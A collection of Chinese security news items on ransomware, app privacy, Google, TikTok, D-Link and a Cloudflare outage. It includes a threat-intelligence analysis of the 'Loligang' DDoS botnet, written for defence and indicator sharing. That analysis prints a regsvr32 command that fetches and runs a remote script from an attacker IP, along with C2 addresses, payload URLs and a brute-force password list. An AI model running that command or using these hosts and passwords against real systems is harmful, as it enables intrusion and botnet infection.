据《纽约时报》报道，全美超过225位市长支持一项不向黑客支付赎金的决议。这项名为“反对向勒索软件攻击犯罪者付款” 的决议指出，市长们应“团结一致反对在发生IT安全漏洞时支付赎金”。 该决议来自6月28日至7月1日在檀香山举行的年度美国市长会议。根据该声明，自2013年以来，至少有170个县、市或州政府系统成为勒索软件攻击的目标。这些攻击使用的恶意软件程序使系统无法运行，黑客通常要求以加密货币的形式支付费用。 该决议发布之前，今年有近二十多个美国城市受到勒索软件攻击，其中包括佛罗里达州的莱克城，后者授权向黑客支付43个比特币以重新获得对其手机和电子邮件系统的访问权。5月份在巴尔的摩开始了另一场引人注目的高调攻击，该攻击通过网络钓鱼邮件关闭了重要的城市系统。黑客要求该市支付13个比特币（当时价值约为76280美元，现在估计约为151599美元）。但是，联邦调查局建议市长副总参谋长Sheryl Goldstein不支付赎金。据估计，这次攻击至少造成了1800万美元的损失。 巴尔的摩市长Bernard C.“Jack”Young在今年的会议上支持了这项措施，并在周三的一份声明中表示，“支付赎金只会激励更多人参与这种非法行为。” 美国市长会议代表了1407个城市，每个城市的人口数超过30000。这些市长的普遍立场与联邦调查局的建议一致。   （稿源：cnBeta，封面源自网络。）

北京时间7月9日早间消息，国际计算机科学研究所（ICSI）的研究人员发现，即使是在用户明确拒绝授权之后，仍有多达1325个Android应用能绕过限制，从用户设备上收集精确的地理位置数据和手机序列号等信息。 这一研究结果凸显了用户想要保护自己的在线隐私是多么困难，特别是在连接到手机和移动应用时更是如此。科技公司拥有成亿人的海量个人数据，包括他们去过哪里、有哪些朋友以及有什么兴趣爱好等。 立法者正试图通过隐私法规来保护用户，而应用许可则本应控制用户选择放弃哪些数据。苹果公司和谷歌已经发布了新的功能来改善用户隐私，但应用却在继续寻找隐藏的方法来绕过这种保护。 在6月底，国际计算机科学研究所的可用安全和隐私研究主任塞尔日·埃格尔曼（Serge Egelman）在美国联邦贸易委员会（FTC）的“隐私大会”（PrivacyCon）上介绍了这项研究。“从根本上说，消费者几乎没有什么工具和线索可以用来合理地控制隐私，并就此做出决定。”埃格尔曼在会议上说道。“如果应用开发者可以直接绕过系统，那么向消费者请求许可就没有意义了。” 埃格尔曼表示，研究人员已在去年9月就这些问题向谷歌和美国联邦贸易委员会发出了通知。谷歌回应称，该公司将设法解决Android Q中的问题，这个操作系统预计将于今年发布。 谷歌表示，此次更新将可解决上述问题，具体方法是隐藏照片中的位置信息，令应用无法获取；同时还将要求任何访问Wi-Fi的应用必须向用户发出请求，才能获取位置相关数据。 这项研究观察了来自Google Play商店的8.8万多个应用，跟踪了当用户拒绝向这些应用给出权限时，数据是如何进行传输的。研究人员发现，照片编辑应用Shutterfly一直都在从照片中收集GPS坐标，并将这些数据发送到自己的服务器，哪怕用户拒绝授权该应用访问其位置数据也无济于事。Shutterfly发言人则表示，不管研究人员发现了什么，该公司只会在获得明确许可的情况下才会收集位置数据。 Shutterfly发表声明称：“跟许多照片服务一样，Shutterfly使用这种数据来增强用户体验，向其提供分类和个性化产品建议等功能，所有这些都符合Shutterfly隐私政策以及Android开发者协议。” 有些应用依靠其他被授权查看个人数据的应用来收集IMEI码等手机序列号，这些应用会读取设备SD卡上不受保护的文件，并获取他们本无权限访问的数据。研究人员称，虽然只有大约13个应用这样做，但其安装次数之和达到了1700万次以上，其中包括百度（NASDAQ:BIDU）的香港迪士尼乐园应用等。 百度和迪士尼尚未就相关置评请求作出回应。 研究人员发现，有153个应用具备这种能力，包括三星的健康和浏览器应用，而共有5亿多台设备安装了这些应用。三星也并未回复相关置评请求。 其他应用则通过连接到Wi-Fi网络、并计算出路由器的MAC地址来收集位置数据，其中包括被用作智能遥控器的应用。 埃格尔曼称，他将在8月Usenix Security安全大会上介绍这项研究，届时将会公布研究人员发现的1325个应用的详细信息。(唐风)   （稿源：，稿件以及封面源自网络。）

北京时间7月6日午间消息，据美国财经媒体CNBC报道，谷歌和其他科技公司最近因各种问题饱受批评，其中包括未能保护用户数据，未能披露其收集和使用的数据，以及未能管理其所提供服务上发布的内容。 诸如谷歌这样的公司，早已通过他们提供的有用服务，深入到我们的生活中，比如Gmail、谷歌地图和谷歌搜索，以及智能产品如可以回答人类提问的谷歌人工助理（Google Assistant）。这些工具带来的便捷，实则以我们的隐私为代价。尽管谷歌辨称隐私不应该成为“奢侈品”，谷歌仍在大量收集用户的数据，而且还让用户更加难以跟踪到底哪些数据收集了，且更加难以删除这些数据。 以下是最新的例子。 5月份，我（CNBC记者）在谷歌的账户管理页面上发现一些奇怪的东西。我注意到，如果你在交易的任何部分使用了Gmail或Gmail地址，谷歌使用Gmail来保存一份清单，记录你购买的一切东西。 如果你的药房处方确认单被发送至了Gmail账户，谷歌会将其记录下来。如果你收到一张梅西百货的收据，谷歌会将其记录下来。如果你点了外卖，收据发送至你的Gmail，谷歌也会将其记录下来。 明白了吗？就是说，你可以在谷歌的“购物”页面查看自己的购买历史记录。 谷歌表示，这样做是为了方便用户使用谷歌人工助理来跟踪包裹或重新订购东西，哪怕有些购物并非邮寄或者也无法重新订购（比如实体店购买的东西），这些购物记录也一并被保存。 在我最初写这篇文章的时候，谷歌曾表示，用户可以点击购买记录并从Gmail中删除来删除该内容。不过，你需要一个一个地手动删除每个购物记录。对于多年积累下来的购物记录，这样的操作着实不容易，可能需要花上数小时乃至几天的时间。 因此，既然谷歌不想让你批量删除这些购物记录，我决定清空我的Gmail邮箱。这意味着，自从我十多年前注册Gmail以来，我所有发送或收到的信息都将全部删除。 然后，尽管有谷歌的保证，但事实并非如此。 周五，在我清空Gmail的三周之后，我查看了我的购物记录清单。我依旧可以看到我几年前的购物收据。处方单、外卖单、亚马逊上买的书籍、iTunes上买的音乐、Xbox Live订阅等等，这些购物记录一条不落，全都在那。 图：谷歌从我的Gmail中提取的购物记录 谷歌还在继续向我展示我最近购买的东西。 我无法删除任何东西，也无法将其关闭。 当我点击单个购买记录并试图删除它的时候，系统提示我不能通过删除邮件来产出购买记录，系统仅仅是将我重新定向到我的收件箱，而不是重新定向到那封我想删除的邮件，因为收件箱里空空荡荡，那封邮件早已被我删除。 所以，谷歌似乎是将这些个人信息缓存或保存在其他位置，而这个位置不只是与我的Gmail账户绑定。 当我一开始写这篇文章的时候，一名谷歌发言人坚称，这张购物记录清单仅供我使用，公司认为它会带来便捷。之后，公司跟进表示说，这些数据是用来“帮助你完成一些任务，比如跟踪包括和重新订购外卖”。 但是，我从未要求体验这样的便捷。而且，不管我说什么或做什么，谷歌一概不管径自收集并存储了这些信息的行为，让人不寒而栗。 谷歌发言人尚未就最新进展发表评论。 但这件事再次证明，科技公司往往不重视用户隐私，且只在用户的愤怒迫使他们行动时才会做出改变。(小白)   （稿源：，稿件以及封面源自网络。）

据国外媒体报道，超过1000万用户被骗安装了一款名为“Updates for Samsung”的假三星应用，该应用声称会更新固件，但实际上，它会将用户重定向到一个充斥着广告的网站，并对固件下载收费。 CSIS安全集团的恶意软件分析师阿莱克塞斯·库普林斯（Aleksejs Kuprins）今天在接受ZDNet采访时表示，“我已经联系了谷歌Google Play应用商店，请求他们考虑移除这款应用。” 三星手机在更新固件和操作系统上比较棘手，假应用Updates for Samsung趁虚而入，安装了它的用户数量很高。 “我们不该指责人们在购买了新的Android设备后，错误地前往官方应用商店寻找固件更新。”库普林斯指出，“要知道，供应商经常将他们的Android操作系统版本与数量惊人的软件捆绑在一起，这很容易让人混淆。” “用户可能会对(系统)更新过程感到有点茫然。因此，可能会错误地前往官方应用商店查找系统更新。” 限速“免费下载” “Updates for Samsung”应用承诺为非技术用户提供一站式的服务，让三星手机用户可以同时获得固件和操作系统更新，从而解决上述问题。 但库普林斯认为，这是该应用的开发者的一个诡计。该应用程序与三星无关，它只在WebView (Android浏览器)组件中加载updato[.]com域。 在浏览这款应用的评论时，你可以看到数百名用户抱怨说，该网站是一个充斥着广告的鬼地方，他们中的大多数人都找不到自己想要的东西——而这只是在该应用运行正常、不会发生崩溃的前提下。 该网站提供免费和付费(正统)的三星固件更新，但在深入研究了该应用的源代码后，库普林斯表示，该网站将免费下载速度限制在56kbps，一些免费固件下载最终会定时失效。 “在我们的测试中，我们也观察到下载没有完成，即使网络条件相当良好。”库普林斯说道。 然而，通过让用户无法下载所有的免费固件，这款应用迫使用户购买34.99美元的高级套装，以便下载任何的文件。 这里的问题是，该应用违反了Google Play的规则，使用自己的支付系统，而不是使用谷歌官方提供的支付通道；截取用户的支付数据，或者由第三方记录这些数据，而不是由谷歌的安全防护更好的支付通道来处理数据。 同样，该应用还提供了19.99美元的SIM卡解锁服务；然而，目前尚不清楚这一服务是否如它所说的那样可行，还是只是另一个攫取钱财的伎俩。 不是恶意软件，而是欺诈和骗局 总而言之，该应用程序不是传统意义上的恶意软件，因为它不会代表用户或未经用户同意执行任何的恶意行为。相对而言，“诈骗”、“欺诈”、“广告软件”这些词能更准确地描述其运作模式。 “我没有发现该应用程序在设备上执行任何的恶意行为，”被问及是否存在其他的可疑行为时，库普林斯向ZDNet证实，“然而，当应用程序打开时，它确实会显示很多的全屏广告，几乎是每次点击屏幕都会弹出这些广告。” 库普林表示，他是在谷歌Play Store中搜索“update”（更新）这个词时发现这个应用程序的。他认为这种搜索很可能会呈现一些不好的应用。 他说，“‘Updates for Samsung’应用之所以出现在靠前的搜索结果里，是因为它的安装量很大。” Updates for Samsung应用的安装量已经突破1000万之多，因此要避免让它给广大用户带来更大的损失，谷歌需要动用它的Play Protect保护服务，直接在用户的手机上禁用该款应用。（乐邦）   （稿源：网易科技，封面源自网络。）

今年早些时候，YouTube 颁布了禁止在视频内容中添加有关黑客攻击和网络钓鱼教程的禁令。然而许多恪守职业道德的“白帽”黑客，也不幸遭到了这家视频网站的错误封杀。比如 Hacker Interchange 联合创始人 Kody Kinzie 就表示，他们只是一家致力于向初学者教授计算机科学与安全方面的知识的公司，但昨天该频道已经无法上传新的视频。 据悉，Hacker Interchange 为 YouTube 观众制作了 Cyber Weapons Lab 系列的视频。但受新政策的影响，他们最近已经无法上传新的内容，已发布的资源也被标记为不可用。 在 YouTube 官方的‘有害或危险内容’提示页上，明确禁止了‘黑客攻击和网络钓鱼’类的教学视频内容，其中包括‘向用户展示如何绕过计算机安全系统，窃取用户凭证和个人数据’。 正如 Kinzie 等人在 Twitter 上吐槽的那样，尽管 YouTube 的初衷是阻止一些非法行为，但此举对于计算机安全研究人员、以及对反黑客 / 网络钓鱼技术感兴趣的人们来说，却是相当不友善的。 即便攻击技术常被黑客用于非法目的，但这样的一刀切确实有些鲁莽。毕竟许多合法的研究人员和计算机系统测试者，也需要经常展开攻防上的实践。 （via TheVerge） 目前暂不清楚 YouTube 执行新政策的确切时间和评判标准，不过从互联网档案馆的资料来看，它其实在今年 4-5 月份就已经存在了。 YouTube 发言人在接受外媒 TheVerge 采访时称，这项政策并非全新推出，只是在今年春季添加了新的例子，以便使现有的规则更加明晰。 根据 YouTube 的描述，其规则允许演示“主要用于教育、纪录片、科学或艺术（ESDA）等目的”的危险行为。照此来看，Hacker Interchange 的 Cyber Weapons Lab 系列视频，明显是属于被误封的。 最新消息是，YouTube 发言人向 TheVerge 证实，被错误标记的 Cyber Weapons Lab 频道已被解封，相关内容正在陆续恢复，且未来该平台会继续完善其审核流程。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/jPA0lCbSi_JLkEn3WoMH7Q   背景 近期腾讯安全御见威胁情报中心监测到一个名为“萝莉帮（Loligang）”的跨平台僵尸网络，可发起DDoS攻击。组成“萝莉帮（Loligang）”僵尸网络的电脑包括Windows服务器、Linux服务器以及大量IoT设备，木马类型包括Nitol、XorDDoS和Mirai。 根据监测数据，受攻击的系统中有较高比例为Weblogic服务器，且攻击时执行的远程脚本中包含VM脚本(在web服务端模板velocity环境执行)，推测此次攻击中采用了各类Web漏洞利用。 Nitol木马入侵Windows系统后会通过IPC$弱口令爆破感染内网中的其他机器，然后连接控制端地址，接受控制指令进行DDoS攻击。感染Linux系统的XorDDoS会在/etc/init.d中创建副本，然后创建一个新的cron.sh脚本并将其添加到定时任务，最终目标为对其他机器发起DDoS攻击。Mirai病毒感染IoT设备，根据不同的CPU架构植入不同的二进制文件，然后对随机生成的IP地址进行探测攻击，接受指令对目标发起DDoS攻击。 “萝莉帮”僵尸网络的组建 详细分析 黑客在HFS服务器http[:]/103.30.43.120:99、http[:]/222.186.52.155:21541 上保存了大量的脚本及木马文件，包括命名后缀为png、vm、sh的脚本，windows平台运行的PE格式文件，Liunx平台运行的ELF格式文件 感染Windows系统 入侵Windows系统后，首先通过以下命令执行远程代码2.png： regsvr32 /u /s /i:http://103.30.43.120:99/2.png scrobj.dll 接着2.png执行Powershell脚本下载Nitol木马ism.exe，保存为json.exe并启动： ism.exe复制自身到windows目录下，重命名为6位随机名，并将自身安装为服务启动。安装的服务名为： “wdwa”，服务描述为：“Microsoft .NET COM+ Integration with SOAP” 创建新的副本，然后将原木马文件删除 释放加载资源文件 通过IPC$爆破横向传播 爆破使用内置的弱口令密码 完成IPC$共享感染后，病毒程序就会创建线程，连接C2服务器，接受并执行来自于C2服务器的指令。解密C2地址，密文为EhMQHRATHRcQHRIREwkLEwsTQw==，Nitol木马的显著标志为的解密算法：base64+凯撒移位+异或。 解密得到的C2地址为：103.30.43.120:8080 发送上线信息 下载执行程序 更新 使用iexplore.exe打开指定网页 执行DDoS攻击 感染Linux系统 根据HFS服务器上的文件命名特征”weblogic.sh”，以及被攻击系统中存在大量的Weblogic服务器，推测黑客针对存在Weblogic漏洞的服务器进行批量扫描攻击。 攻击使用的.vm脚本为velocity支持的代码(velocity是基于java的web服务端模板引擎)，利用该模板引擎的漏洞进行攻击后，执行远程代码cnm.vm,通过cnm.vm继续下载和执行Linux脚本9527.sh。 (hxxp:// 222.186.52.155:21541/9527.sh) Linux脚本9527.sh在感染机器植入ELF木马crosnice (hxxp:// 222.186.52.155:21541/crosnice) crosnice为感染Linux平台的XorDDoS木马, XorDDoS这个名称源于木马在与C&C(命令和控制服务器)的网络通信中大量使用XOR加密。 创建脚本/etc/cron.hourly/cron.sh,设置定时任务，每3分钟执行一次脚本。 写入脚本代码到/etc/init.d/%s/目录下 对其他机器发起DDoS攻击的代码 感染IoT设备 该服务器上还发现保存有多个mirai病毒变种，每个变种对应一个特定的平台。Mirai感染受害者设备后，会释放一个shell脚本ssh.sh，shell脚本会下载和执行与当前架构相适应的可执行文件。包括针对以下CPU架构而构建的二进制文件：arm、arm5、arm6、arm7、mips、mpsl、ppc、sh4、spc、xb6、m68k 二进制程序在相应的平台运行后会创建一个随机IP地址列表，并针对具有弱凭据或已知漏洞的设备进行探测攻击，同时连接C2地址，接受指令执行DDoS攻击。 安全建议 1. 定期对服务器进行加固，尽早修复服务器相关组件安全漏洞，部分Weblogic漏洞修复建议如下： CVE-2017-10271修复补丁地址： https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html CVE-2019-2725补丁包下载地址如下： https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html 2. 服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解，排查IOCs中的弱口令 3. 针对IoT设备的安全建议： 1）根据要求和安全策略修改IoT设备的默认隐私和安全设置。 2）更改设备上的默认凭据。为设备帐户和Wi-Fi网络使用强大且唯一的密码。 3）在设置Wi-Fi网络访问（WPA）时使用强加密方法。 4）禁用不需要的功能和服务。 5）禁用Telnet登录并尽可能使用SSH。 4. 使用腾讯御点拦截可能的病毒攻击（https://s.tencent.com/product/yd/index.html 5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统，是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html IOCs IP 122.10.82.239 139.196.209.127 103.30.43.120 222.186.52.155 122.10.82.239 Domain xiaojiuddos.f3322.net 6004.f3322.net xiao999.f3322.net download.nadns.info nadns.info ip.yototoo.com C&C 139.196.209.127:2017 103.30.43.120:8080 103.30.43.120:99 222.186.52.155:21541 md5 ad2fee695125aa611311fe0d940da476 24abf520f8565b3867fb2c63778d59be 6595022fb65c6e02c1ebc731ce52b147 7a158bd42c896807431b798e70f6feb4 d329eddf620c9f232bad8eb106020712 975fe4000d8691b00c19fefae2041263 058281e2cb0add01537fb2a2e70f4ffc 17d704d023e8001f11b70cc3d1c1800a d1d4da603e2be3f131fa1030e9d0038e d34903535df5f704ad1fd25bd0d13f1c 57655082c058a53f9962e81f7c13f9d7 16e6ec559f3986faa22d89bfaca93a76 62a6eee507bde271f9ec8115526da15a 6a3ac93afcc8db933845bcac5f64347a 29845bf22eb39dda90b8219f495fea14 98d64c090183b72809d4aef0ed6359fd 4eb3be468994ad865317fb68cc983dc6 505e64fb3f1edbabc4374dbfc8f98063 eecca0eb6255682a520814e991515d83 f31daa9d4e9f5a24fc4dbe63ea717da6 d96a091040c54a18cdc1686533338253 414e0c8015865762933693b6eff5b8fd 9dec0cdebc8d1e6f8378af24bd66e4f4 a936182ca83f750e4845c5915800cb6b URL http[:]/103.30.43.120:99/1.png http[:]/103.30.43.120:99/ism.exe http[:]/103.30.43.120:99/loligang.arm http[:]/103.30.43.120:99/rsrr.vm http[:]/103.30.43.120:99/W4.7.exe http[:]/103.30.43.120:99/2.png http[:]/103.30.43.120:99/down.png http[:]/103.30.43.120:99/payload.exe http[:]/103.30.43.120:99/pos.vm http[:]/103.30.43.120:99/weblogic.sh http[:]/222.186.52.155:21541/arxc http[:]/222.186.52.155:21541/mixc http[:]/222.186.52.155:21541/loligang.arm http[:]/222.186.52.155:21541/loligang.arm5 http[:]/222.186.52.155:21541/loligang.mips http[:]/222.186.52.155:21541/sh/1.sh http[:]/222.186.52.155:21541/sh/AV.sh http[:]/222.186.52.155:21541/sh/dcmini.sh http[:]/222.186.52.155:21541/sh/nice.sh http[:]/222.186.52.155:21541/sh/R.sh IPC$弱口令： Woaini Baby Asdf Angel Asdfgh 1314520 5201314 Caonima 88888 Bbbbbb 12345678 Memory Abc123 Qwerty 123456 111 Password Enter Hack Xpuser Money Yeah Time 参考链接： https://www.freebuf.com/column/153847.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection

因担心 Facebook 新推出的 Libra 加密货币会被别有用心者利用和掩盖，美众议院民主党人、金融服务委员会主席 Maxine Waters 在该项目于上月宣布后不久，就已经提出了暂时搁置的要求，直到国会与监管机构有时间检查其可能对全球金融系统带来的潜在风险。今天，Maxine Waters 正式致信 Facebook 首席执行官 Mark Zuckerberg、首席运营官 Sheryl Sandberg、以及 Calibra CEO David Marcus 。 Libra 或构成危及美国与全球金融系统稳定的风险（via TheVerge） 除了 Maxine Waters，除了沃特斯之外，众议院财政小组委员会领导人也在这封信上署了名。其表示： 与其它加密货币、钱包、交易所一样，若类似的产品和服务不能得到适当的监管、漏洞被别有用心者利用和掩盖，或危及美国和全球金融系统的稳定。 除了参议院的民主党人，银行业主席 Mike Crapo 也计划于 7 月 16 日邀 Marcus 举行一场听证会，理由是担心加密货币及其带来的数据隐私风险。 对此，Facebook 发言人在周二表示，其期待与议员们合作推动新事物向前发展，包括在即将举行的众议院金融服务委员会听证会上回答他们的问题。 Waters 指出：由于 Facebook 用户数已达全球 1/4 的人口，因此 Facebook 及其合作伙伴必须立即停止实施计划，直到监管机构和国会有机会审查这些风险、并采取相应的行动。   （稿源：cnBeta，封面源自网络。）

7月3日消息，据国外媒体报道，就其如何处理年轻用户的安全和隐私问题，抖音短视频应用国际版TikTok正在英国接受调查。调查如果认定TikTok有问题，该短视频应用可能会遭遇2260万美元的罚款处罚。 据英国《卫报》（The Guardian）报道，英国信息专员伊丽莎白·德纳姆(Elizabeth Denham)当地时间周二向一个议会委员会表示，这款受欢迎的短视频应用可能违反了欧盟的《通用数据保护条例》（GDPR）规定：科技公司必须对儿童有不同的规定和保护。在美国联邦贸易委员会（FTC）以违反儿童隐私为由对TikTok作出罚款处罚后不久，英国于2月份开始也以侵犯儿童隐私为由对TikTok展开了调查。 德纳姆列出的问题之一是TikTok的开放消息平台，该平台允许成年人用户与儿童用户进行自由交流。“我们在关注用于儿童的透明化工具，”德纳姆对该议会委员会表示，“我们正在注意这种完全开放的短消息系统，关注儿童在网络上收集和分享的这些视频。我们现正在对TikTok开展积极的调查，以便弄清楚这一空间。” TikTok是字节跳动旗下公司，其核心用户大多数为青少年群体。但是，关于在将核心用户安全问题放在优先位置方面，TikTok正受到全球各地的批评。 来自英国慈善机构Barnardo的一份报告显示，犯罪者针对着只有8岁的目标用户，并且向其传递明确的性信息。尽管该短视频应用要求用户在13岁或13岁以上才能发布内容，但大多数年轻用户可以轻松绕过这一年龄门槛。在印度和印尼，这款短视频应用曾被短暂禁止，原因是担心它无法保护年轻用户群体免受掠夺者和施虐者的侵害。 据美国的新闻聚合网站Buzzfeed的一项调查显示，TikTok未能在自己的平台上推出针对性掠食者的应对策略，这导致用户自行采取了行动。他们制作呼叫视频，并蜂拥而至其他平台，向其他用户发出关于施虐者的提醒信息。 如果英国认为TikTok有问题，该短视频可能将面临高达营收4%的罚款处罚，也即高达1790万英镑(约合2260万美元)的罚款。（天门山）   （稿源：网易科技，封面源自网络。）

针对智能家用安防摄像头和无线路由器存在的安全风险，美国联邦贸易委员会（FTC）刚刚了结了与 D-Link 的诉讼。该机构周二表示，该公司已同意在产品发布前做好规划，完成应有的威胁建模、漏洞测试、以及软件安全计划。这场诉讼始于 2017 年，起因是 D-Link 路由器和 IP 摄像头存在安全漏洞，或导致用户私密信息（实时音视频）被黑客攻击或别有用心的第三方窥探。 （图自：D-Link，via Cnet） FTC 指出，D-Link 未能保障最基本的软件安全，例如测试和修复“众所周知且可预防的安全漏洞”—— 包括硬编码登录凭证、用 Guest 作为登录用户名、以及在设备和 App 上明文保存密码。 此外，D-Link 需要对安全漏洞展开持续监测、发布固件更新、并接受独立安全研究人员的漏洞报告。 根据 FTC 向美国加州地方法院提交的拟议和解协议，未来 10 年，D-Link 都需要获得由独立的第三方给出的双年度软件安全项目报告。   （稿源：cnBeta，封面源自网络。）

受互联网基础设施服务提供商 Cloudflare 故障影响，目前已有许多网站遭遇了宕机，最明显的就是在访问时提示 502 网关错误。此前，Cloudflare 已经汇报 Discord、OKCupid、Peloten、Feedly 和 CoinDesk 等网站服务离线。但最讽刺的，莫过于通常用于检查 Web 服务中断的 DownDetector 站点也受到了影响。 （截图 via TheVerge） Cloudflare 首席执行官 Matthew Prince 在某条推特底下表示，本轮宕机事件并非黑客攻击所引发，而是服务器超载了。他写到：“由于 CPU 使用量激增，导致主系统和备份系统出现了崩溃”。 受本轮宕机事件影响，加密货币交易所 CoinDesk 显示了不正确的报价，错误地将比特币价格压低到了 26 美元（BTC 在今年 6 月份飙到了 10000 美元以上）。 Prince 后来在 Cloudflare 博客文章中解释称，CPU 峰值使用率超载是由于软件部署的不良导致的。该公司预计网站受影响的时间在 30 分钟左右，但在执行回滚操作后已陆续重新上线。 不过，与 6 月 24 日发生的宕机事件不同，那一次 Prince 声称是 Verizon 的网络问题才导致了故障的发生。   （稿源：cnBeta，封面源自网络。）